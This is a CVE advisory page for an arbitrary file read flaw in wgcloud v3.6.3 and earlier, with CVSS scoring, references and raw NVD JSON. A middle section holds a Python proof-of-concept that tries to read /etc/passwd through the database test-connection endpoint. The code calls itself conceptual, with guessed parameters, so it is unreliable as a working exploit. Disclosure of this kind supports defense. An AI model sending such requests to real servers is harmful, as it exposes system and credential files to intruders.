CVE-2026-30403

Description

There is an arbitrary file read vulnerability in the test connection function of backend database management in wgcloud v3.6.3 and before, which can be used to read any file on the victim's server.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:wgstart:wgcloud:*:*:*:*:*:*:*:* - VULNERABLE

WGCLOUD <= 3.6.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Conceptual example based on vulnerability description)
target_url = "http://target-ip:9999/api/main/database/testConnect"

# Payload attempting to read a sensitive file
# Note: The actual parameter names may vary based on the specific version and implementation
payload = {
    "dbType": "mysql", 
    "url": "file:///etc/passwd", # Attempting to use file protocol or path traversal
    "host": "localhost",
    "port": "3306",
    "name": "root",
    "user": "root",
    "pwd": "password"
}

try:
    # Send POST request to the vulnerable endpoint
    response = requests.post(target_url, data=payload, timeout=10)
    
    if response.status_code == 200:
        # Check if the response contains expected file content
        if "root:" in response.text:
            print("[+] Exploit successful! Arbitrary file read detected.")
            print("[+] Response content:")
            print(response.text)
        else:
            print("[-] Request sent but exploitation pattern not confirmed.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-30403
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-30403
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-30403/
[4] VulDB https://vuldb.com/cve/CVE-2026-30403
[5] https://github.com/TTTlw1024/qwe/issues/2
[6] https://github.com/tianshiyeben/wgcloud/issues/97

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-30403", "sourceIdentifier": "[email protected]", "published": "2026-03-19T17:16:23.950", "lastModified": "2026-04-02T12:19:47.237", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "There is an arbitrary file read vulnerability in the test connection function of backend database management in wgcloud v3.6.3 and before, which can be used to read any file on the victim's server."}, {"lang": "es", "value": "Hay una vulnerabilidad de lectura arbitraria de archivos en la función de prueba de conexión de la gestión de bases de datos de backend en wgcloud v3.6.3 y versiones anteriores, que puede ser utilizada para leer cualquier archivo en el servidor de la víctima."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wgstart:wgcloud:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.6.3", "matchCriteriaId": "CE012BD6-0C9B-4F63-957E-78C9565F977C"}]}]}], "references": [{"url": "https://github.com/TTTlw1024/qwe/issues/2", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/tianshiyeben/wgcloud/issues/97", "source": "[email protected]", "tags": ["Issue Tracking"]}]}}